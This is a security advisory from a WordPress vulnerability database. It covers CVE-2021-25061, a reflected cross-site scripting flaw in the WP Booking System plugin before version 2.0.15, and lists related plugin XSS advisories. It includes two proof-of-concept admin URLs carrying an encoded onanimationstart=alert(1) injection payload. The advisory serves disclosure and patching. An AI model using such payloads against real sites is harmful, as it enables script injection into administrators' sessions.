WP Booking System – Booking Calendar < 2.0.15 – Authenticated Reflected Cross-Site Scripting (XSS) | CVE 2021-25061 | Plugin Vulnerabilities

Description

The plugin was affected by a reflected xss in wp-booking-system on the wpbs-calendars admin page.

Proof of Concept

http://127.0.0.1:8001/wp-admin/admin.php?page=wpbs-calendars&s=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%281%29+x%3D 


or

http://127.0.0.1:8001/wp-admin/admin.php?page=wpbs-forms&s=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%281%29+x%3D

Affects Plugins

wp-booking-system

Fixed in 2.0.15

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2643776/wp-booking-system

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

bd9dc754-08a4-4bfc-8dda-3f5c0e070f7e

Timeline

Publicly Published

2021-12-10 (about 4 years ago)

Added

2021-12-14 (about 4 years ago)

Last Updated

2022-04-16 (about 3 years ago)

Other

Published

Title

Published

2024-07-10

Title

Master Popups <= 1.0.3 - Authenticated (Editor+) Stored Cross-Site Scripting

Published

2024-05-23

Title

LottieFiles – JSON Based Animation Lottie & Bodymovin for Elementor < 1.10.10 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-09-29

Title

Big Post Shipping for WooCommerce < 2.1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-08-12

Title

Mega Addons For Elementor <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-08-30

Title

nuajik CDN <= 0.1.0 - Admin+ Stored XSS